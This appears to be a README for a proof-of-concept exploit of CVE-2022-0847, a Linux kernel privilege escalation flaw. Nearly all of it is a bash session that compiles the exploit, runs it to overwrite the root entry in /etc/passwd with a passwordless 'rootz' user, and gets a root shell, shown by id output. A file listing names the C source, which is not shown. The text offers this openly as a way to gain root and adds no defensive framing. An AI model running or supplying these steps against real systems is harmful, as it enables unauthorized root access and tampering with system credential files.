CVE-2022-0847: Linux Kernel Privilege Escalation Vulnerability# CVE_2022_0847
CVE-2022-0847: Linux Kernel Privilege Escalation Vulnerability
---
## POC
A Simple Proof of concept to get root shell.
```bash
$ gcc cve_2022_0847.c -o exploit
$ ./exploit /etc/passwd 1 ootz:
$ su rootz
# id
uid=0(root) gid=0(root) groups=0(root)
```
[4.0K] /data/pocs/2e259e4ed096b8a35f3c558802076347332136d7
├── [4.4K] cve_2022_0847.c
└── [ 270] README.md
0 directories, 2 files